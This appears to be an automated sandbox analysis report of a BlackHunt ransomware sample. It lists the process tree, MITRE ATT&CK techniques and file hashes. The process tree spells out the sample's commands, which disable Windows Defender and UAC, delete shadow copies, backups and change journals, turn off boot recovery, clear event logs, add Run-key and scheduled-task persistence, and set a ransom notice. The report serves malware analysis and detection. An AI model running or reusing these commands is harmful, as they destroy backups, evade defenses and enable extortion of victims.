description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe"C:\Users\Admin\AppData\Local\Temp\926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2192 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2808
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2760
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:1808
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2580
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2292
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1196
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:768
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2264
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1360
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2640
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:284
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2848
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2152
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2440
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2132
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2880
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1568
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1920
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1556
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2972
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1584
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe" /F2⤵PID:2032
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe" /F3⤵
- Creates scheduled task(s)
PID:2060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1956
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2244
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:576
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1448
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:3788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2532
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2916
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1736
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1288
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2344
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2352
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:2784
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:3496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3688
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3644
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3288
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:1336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3444
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3956
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:2476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:228
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:1520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3232
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:2296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3596
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2204
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3804
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3716
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3328
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3540
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3960
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:356
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3600
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3840
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3668
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:2572
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2988
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:1860
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1272
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe"2⤵
- Deletes itself
PID:3628 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1804
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1499656828-1337927179544155908-9616412551719766727356870446328816450-232720177"1⤵PID:1468
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1292
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2616
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2580
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD5b72150e05b3584c488810b13db7cef14
SHA111066c488debc6cf8f43721023cf5b4759902e2d
SHA256958d68d7c0da6270d4686f96906f522b3241068c841205743542c78cd3ebcf2a
SHA51220097b8c1d851e7d0169d980716eaf4e558d743e97a6b099f96b37e73bf349b83373e19c8902c63e3510ffbbb08505e3164cd3acdd30de68141809e6f953fcd0
-
Filesize
1KB
MD53833d986253d16a2fa2c9183a0c5985a
SHA17a9002473d2ad94aef7b12c9255e5a6f53a09a90
SHA25638d86aba269233159adaf4921aa1ae7c7f31d792aee0710718c7421006d4dadf
SHA512305b63d122b35291b75db2aa66e0fa1fbb116947aa0891ac50e9995504d35306646fc500c4e6126953d378ac26fdbc98c213e6af363e8eea6c68446ef2dce440
-
Filesize
684B
MD5bf240044a4ab19e267f8583de80081b8
SHA1883f289fa460917aef433f92cbe70f2a8857f9a7
SHA256f30a3c968ee02b7a5c3674bd1ddbd8c517554bd01133016be7e4f1f499d06522
SHA5125005f8a58fbc57f361befe551df2d347a536b6079aa2c06ef7f6c818e1c45d6b8b48b10d33d12d873ff31ae72f7cd1f2ed13be4760dabeca173717f38b1f835c